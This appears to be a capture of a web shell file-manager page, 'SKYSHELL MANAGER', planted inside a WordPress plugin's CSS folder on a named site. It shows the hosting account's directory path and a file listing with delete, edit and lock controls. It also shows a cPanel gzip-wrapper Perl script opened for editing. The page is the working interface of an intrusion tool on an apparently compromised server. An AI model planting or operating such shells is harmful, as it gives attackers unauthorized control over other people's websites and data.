📁
SKYSHELL MANAGER
PHP v8.0.30
Create
Create
Path:
root
/
home
/
godaofbq
/
drhyperbaric.com
/
wp-content
/
plugins
/
loginpress
/
css
/
themes
/
Name
Size
Perm
Actions
📄
error_log
296.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: gzip-wrapper
#!/usr/local/cpanel/3rdparty/bin/perl # cpanel - bin/gzip-wrapper Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited use strict; use Cpanel::Gzip::Config (); my $config = Cpanel::Gzip::Config->load(); my @command = $config->command(); -x $config->{'bin'} or die("Binary ($config->{'bin'}) not available"); exec( @command, @ARGV ) or die("Failed to exec: @command: $!");
Save